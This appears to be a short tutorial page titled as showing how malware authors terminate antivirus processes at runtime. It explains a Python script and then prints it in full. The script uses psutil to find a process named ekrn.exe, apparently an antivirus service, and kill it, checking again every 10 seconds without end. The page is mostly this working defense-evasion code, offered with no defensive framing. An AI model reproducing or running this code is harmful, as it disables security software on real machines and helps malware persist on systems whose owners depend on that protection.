🍫How Malware Author Terminate Antivirus Process during runtime ?
How Malware Author Terminate Antivirus Process during runtime ?
Explanation
Import Libraries:
psutilfor process management.timefor adding delays.
Define
terminate_process_by_nameFunction:Iterates over all running processes and checks if the process name matches
ekrn.exe.Terminates the process if a match is found.
Handles exceptions if the process no longer exists or access is denied.
Returns
Trueif the process was found and terminated; otherwise,False.
Main Block:
Sets the process name to
ekrn.exe.Continuously checks for the process every 10 seconds.
Prints status messages indicating whether the process was found and terminated.
Loop and Delay:
The
while Trueloop ensures the script keeps running and checking for the process.time.sleep(10)introduces a delay of 10 seconds between checks to avoid excessive CPU usage.
// import psutil
import time
def terminate_process_by_name(process_name):
"""Terminate processes by their name."""
for process in psutil.process_iter(['name']):
if process.info['name'].lower() == process_name.lower():
try:
process.terminate()
print(f"Terminated process: {process.info['name']} (PID: {process.pid})")
return True
except psutil.NoSuchProcess:
print(f"Process {process.info['name']} (PID: {process.pid}) no longer exists")
except psutil.AccessDenied:
print(f"Access denied to terminate process: {process.info['name']} (PID: {process.pid})")
return False
if __name__ == "__main__":
process_name = 'ekrn.exe'
while True:
found = terminate_process_by_name(process_name)
if found:
print(f"Process {process_name} was found and terminated.")
else:
print(f"Process {process_name} not found.")
# Wait for 10 seconds before checking again
time.sleep(10)
Last updated